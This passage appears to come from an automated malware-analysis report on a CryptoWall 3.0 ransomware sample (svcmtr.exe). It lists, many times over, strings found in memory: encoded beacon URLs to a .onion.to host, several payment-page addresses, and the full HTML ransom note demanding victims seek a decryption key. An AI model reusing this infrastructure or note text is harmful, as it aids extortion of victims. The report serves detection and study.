href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: svcmtr.exe, 00000002.00000003.767146021.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DF
Source: svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/
Source: svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/Bm
Source: svcmtr.exe, 00000002.00000003.660965123.000000000371C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFl
Source: svcmtr.exe, 00000002.00000003.764822629.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.775595074.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.767051800.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.660093586.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFl
Source: svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DF
Source: svcmtr.exe, 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B
Source: svcmtr.exe, 00000002.00000003.765928190.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.660343481.0000000003733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFl
Source: svcmtr.exe, 00000002.00000003.765473859.000000000374E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DF
Source: svcmtr.exe, 00000002.00000003.779806778.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" 